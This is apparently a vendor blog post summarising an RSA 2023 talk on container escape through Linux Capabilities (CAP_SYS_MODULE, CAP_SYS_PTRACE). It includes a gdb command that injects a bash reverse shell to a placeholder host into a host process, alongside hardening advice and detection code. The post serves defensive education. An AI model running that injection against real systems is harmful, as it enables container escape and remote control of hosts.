An Insight into RSA 2023: Capabilities Utilization for Container Escape

June 23, 2023 | NSFOCUS

At this year's RSA Conference, researchers from Cybereason presented “Container Escape: All You Need Is Cap (Capabilities)”, detailing three methods of abusing Capabilities to escape from containers. Their aim was to draw users' attention to how Capabilities are allocated to containers and to encourage best practices. This article introduces the technical principles behind using Capabilities for container escape, one of the security risks facing containerized infrastructure.

I. Capabilities Utilization

Introduction to Capabilities

The Capabilities mechanism was introduced in version 2.2 of the Linux kernel. It divides root privileges into finer-grained units so that they can be granted on demand. The common Capabilities are documented on the Linux manual page [1]; some examples are shown in Figure 1:

Figure 1 Capabilities Permissions and System Calls

Most Capabilities are narrowly scoped and cover only a small number of system calls, but some carry excessive privileges, such as CAP_SYS_ADMIN:

Figure 2 CAP_SYS_ADMIN Details

As shown in Figure 2, the manual page itself warns that this Capability is “overloaded”, a risk that was analyzed as early as the article “CAP_SYS_ADMIN: the new root”^[2]. CAP_SYS_ADMIN not only allows system calls such as mount, umount, and quotactl, but also covers the operations of other Capabilities, such as CAP_PERFMON, CAP_BPF, and CAP_CHECKPOINT_RESTORE.

Capabilities Discovery

By default, the Docker container has the Capabilities shown in Figure 3:

Figure 3 Default Capabilities in Docker v20.10.7

You can also proactively assign specified Capabilities when starting a container based on business needs, in the following ways:

1) Add a specified Capability:

docker run --cap-add=<CAPABILITY> -it <IMAGE>

2) Add all Capabilities:

docker run --cap-add=ALL -it <IMAGE>

3) Drop a specified Capability:

docker run --cap-drop=<CAPABILITY> -it <IMAGE>

4) Drop all Capabilities:

docker run --cap-drop=ALL -it <IMAGE>
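The four forms above differ only in their --cap-add and --cap-drop flags, so they can be generated programmatically. The following is a minimal Python sketch, not part of the original talk: the helper name docker_run_argv and the image name "alpine" are illustrative assumptions, and only the --cap-add, --cap-drop, and -it flags come from the Docker CLI.

```python
import shlex


def docker_run_argv(image, add=(), drop=(), interactive=True):
    """Build an argv list for `docker run` with capability flags.

    `docker_run_argv` is a hypothetical helper for illustration only.
    """
    argv = ["docker", "run"]
    # List drops before adds so a "drop ALL, add back" policy is easy to read.
    argv += [f"--cap-drop={cap}" for cap in drop]
    argv += [f"--cap-add={cap}" for cap in add]
    if interactive:
        argv.append("-it")
    argv.append(image)
    return argv


if __name__ == "__main__":
    # "alpine" is a placeholder image name, not taken from the article.
    cmd = docker_run_argv("alpine", add=["NET_BIND_SERVICE"], drop=["ALL"])
    print(shlex.join(cmd))
```

Building the command as a list rather than a string avoids shell-quoting mistakes if the list is later passed to subprocess.run.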

In Kubernetes, Capabilities can be configured through the securityContext field:

Figure 4 SecurityContext Configuration in Kubernetes

In real-world container attack and defense scenarios, a container's Capabilities can be viewed with the cat /proc/1/status command, as shown in Figure 5:

Figure 5 Capabilities Discovery

The Capabilities values are displayed as bitmasks. To make them readable, decode them with the capsh --decode=<BITMASK> command (note that most container environments do not have the capsh tool installed), as shown in Figure 6:

Figure 6 CAP BITMASK Decoding
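Because capsh is often missing inside containers, the same decoding can be done by hand. The sketch below is an illustration rather than the researchers' tooling. It assumes the bit order defined in the kernel's linux/capability.h (bit 0 is CAP_CHOWN, bit 40 is CAP_CHECKPOINT_RESTORE), and the function names decode_caps and effective_caps are hypothetical.

```python
# Capability names indexed by bit position, following linux/capability.h.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_caps(bitmask_hex):
    """Return the names of the capabilities set in a hex bitmask string."""
    mask = int(bitmask_hex, 16)
    names = []
    bit = 0
    while mask >> bit:
        if (mask >> bit) & 1:
            # Bits beyond the table are reported instead of silently dropped.
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES)
                         else f"unknown_bit_{bit}")
        bit += 1
    return names


def effective_caps(status_text):
    """Decode the CapEff line from the content of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return decode_caps(line.split(":", 1)[1].strip())
    return []


if __name__ == "__main__":
    try:
        with open("/proc/1/status") as fh:
            print(effective_caps(fh.read()))
    except OSError:
        # /proc is unavailable (for example, not on Linux): use a sample value.
        print(decode_caps("00000000a80425fb"))
```

The sample value 00000000a80425fb, a bitmask commonly seen for Docker's default set, decodes to 14 names from CAP_CHOWN through CAP_SETFCAP. Seeing CAP_SYS_ADMIN, CAP_SYS_MODULE, or CAP_SYS_PTRACE in the output is a sign that the container is worth a closer look.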

Utilizing CAP_SYS_MODULE for Container Escape

The CAP_SYS_MODULE permission allows kernel modules to be loaded and unloaded, as shown in Figure 7:

Figure 7 Details of CAP_SYS_MODULE

When a container is granted this permission, attackers can load custom kernel modules from inside the container. One approach is to upload a precompiled kernel module; because kernel versions differ, a precompiled module may not be portable, but it can be built locally in an environment that matches the target. Another approach is to compile the module directly in the target container. For specific steps, refer to “Abusing CAP_SYS_MODULE to Cause Container Escape”^[3]. The general principle is shown in Figure 8:

Figure 8 Attack process for installing kernel modules

Utilizing CAP_SYS_PTRACE for Container Escape

Figure 9 Details of CAP_SYS_PTRACE

When a container is granted the CAP_SYS_PTRACE permission, processes in it can trace arbitrary processes with the ptrace() system call.

The ptrace() system call is a process-tracing mechanism provided by Linux. It allows one process (the tracer) to monitor and control another process (the tracee). The tracer can read and write the tracee's registers and memory, and can control its execution, for example by single-stepping or interrupting it. ptrace() is typically used to implement debuggers such as GDB, which debug applications, track down the cause of crashes, or generate dump files when an application crashes. ptrace() can also be used for code injection and other advanced debugging techniques. When a container shares the host's PID namespace, an attacker can escape the container by injecting into a host process.

The following introduces two methods of escaping with the ptrace() system call.

1) Process Debugging

The attack principle of process debugging is shown in Figure 10:

Figure 10 Using Process Debugging for Container Escape

Prerequisites for this technique:

CAP_SYS_PTRACE
AppArmor is configured as Unconfined
Shared host pid namespace

From inside the container, look up the process ID (PID) of a process running on the host, then attach to it with gdb and make it execute a command:

gdb -p <PID>

call (void)system("bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'")

2) Shellcode injection

The attack principle of Shellcode injection is shown in Figure 11:

Figure 11 Shellcode injection for escape

Prerequisites for this technique:

CAP_SYS_PTRACE
AppArmor is configured as Unconfined
Shared host pid namespace

After looking up the PID of a host process, run the injection code^[4]:

Figure 12 Shellcode Injection Process

II. Defense and Detection

In production, the Capabilities granted to containers are not always strictly limited. Many open-source applications are granted elevated Capabilities when deployed in containers, as shown in Figure 13:

Figure 13 Parameter Details of Container Deployment for Open Source Projects

So, how can an enterprise defend and detect such threats? The following are the best practices and some detection ideas for container use.

Best Practices for Container Usage

When creating a container, drop all Capabilities first, and then add back only those required with --cap-add
Avoid privileged containers and avoid granting CAP_SYS_ADMIN
Run containerized workloads as a non-root user
Set allowPrivilegeEscalation to false to disable privilege escalation
Tighten the Seccomp policy^[5] to limit the execution of malicious system calls
Tighten the AppArmor policy to restrict access to system resources
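Several of these practices can be checked mechanically against a Kubernetes container securityContext. The following Python sketch is one possible check, not a complete policy. It assumes the securityContext has already been parsed into a dict (for example, from a manifest); the function name lint_security_context and the RISKY_CAPS set are illustrative assumptions, while the field names (capabilities, privileged, allowPrivilegeEscalation, runAsNonRoot) are the ones Kubernetes uses.

```python
# Capabilities this sketch treats as high risk (an illustrative choice).
RISKY_CAPS = {"ALL", "SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE"}


def _normalize(cap):
    """Upper-case a capability name and strip an optional CAP_ prefix."""
    cap = cap.upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def lint_security_context(ctx):
    """Return a list of findings for a container securityContext dict."""
    findings = []
    caps = ctx.get("capabilities") or {}
    added = {_normalize(c) for c in caps.get("add") or []}
    dropped = {_normalize(c) for c in caps.get("drop") or []}

    if "ALL" not in dropped:
        findings.append("capabilities.drop does not include ALL")
    for cap in sorted(added & RISKY_CAPS):
        findings.append(f"high-risk capability added: {cap}")
    if ctx.get("privileged"):
        findings.append("privileged container")
    if ctx.get("allowPrivilegeEscalation") is not False:
        findings.append("allowPrivilegeEscalation is not set to false")
    if ctx.get("runAsNonRoot") is not True:
        findings.append("runAsNonRoot is not set to true")
    return findings


if __name__ == "__main__":
    # A hypothetical, deliberately weak configuration for demonstration.
    weak = {"privileged": True, "capabilities": {"add": ["SYS_ADMIN"]}}
    for finding in lint_security_context(weak):
        print(finding)
```

The check treats a missing field the same as an unsafe value, on the assumption that an explicit setting is easier to audit than a default. Seccomp and AppArmor profiles are not covered here.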

Detection Ideas

Monitor containers running suspicious or unknown images
Monitor suspicious system calls initiated from within containers, such as init_module and ptrace
Monitor suspicious processes spawned in containers or on hosts
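The system call idea can be sketched as a simple filter over runtime events. The event format below (dicts with "container_id" and "syscall" keys) is a hypothetical schema chosen for illustration and does not correspond to any particular monitoring tool. Besides init_module and ptrace, the watch list includes finit_module and delete_module, the other Linux system calls for loading and unloading kernel modules; that extension is an assumption of this sketch.

```python
# System calls to watch: init_module and ptrace come from the list above;
# finit_module and delete_module are added as related module operations.
SUSPICIOUS_SYSCALLS = {"init_module", "finit_module", "delete_module", "ptrace"}


def suspicious_events(events):
    """Yield events that come from a container and use a watched syscall.

    Each event is assumed to be a dict with "container_id" and "syscall"
    keys; this schema is hypothetical.
    """
    for event in events:
        if event.get("container_id") and event.get("syscall") in SUSPICIOUS_SYSCALLS:
            yield event


if __name__ == "__main__":
    # Made-up sample events, for demonstration only.
    sample = [
        {"container_id": "c1", "syscall": "read"},
        {"container_id": "c1", "syscall": "ptrace"},
        {"container_id": None, "syscall": "init_module"},
    ]
    for event in suspicious_events(sample):
        print(event)
```

In practice, a rule like this would need allowlists for legitimate debuggers and module loaders to keep false positives manageable.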

III. Conclusion

This article has introduced techniques for container escape that abuse Capabilities. Compared with exploiting vulnerabilities, abusing such insecure configurations is simpler and more practical. The reason is that enterprise users running container environments tend to respond promptly to vulnerability notifications by fixing affected cloud-native infrastructure, upgrading versions, or applying patches, but often overlook the risk of improper configuration. Security mechanisms such as Capabilities, Seccomp, and AppArmor must be configured properly by people. However, factors such as limited skills, weak security awareness, and lack of practice make it difficult to follow best practices during configuration. Ensuring that best practices are applied to secure cloud-native environments has become a problem that enterprises need to consider and solve.

NSFOCUS Cloud Native Security Platform (CNSP), based on the CIS Docker Benchmarks^[6] and CIS Kubernetes Benchmarks, implements compliance checks for containers, runtimes, orchestration systems, and orchestration files. It can promptly identify and harden unsafe configurations in the cloud-native environment, helping users build a secure cloud-native environment.

NSFOCUS CNSP also supports security detection for cloud-native environments, covering behaviors and activities on hosts and containers, including container escape, reverse shells, container authorization, malicious command execution, backdoor deployment, lateral movement, and other types of attack behaviors.

References

[1] https://man7.org/linux/man-pages/man7/capabilities.7.html

[2] https://lwn.net/Articles/486306/

[3] https://github.com/Metarget/metarget/tree/master/writeups_cnv/config-cap_sys_module-container

[4] https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c

[5] https://github.com/moby/moby/blob/master/profiles/seccomp/default.json

[6] https://www.cisecurity.org/benchmark/docker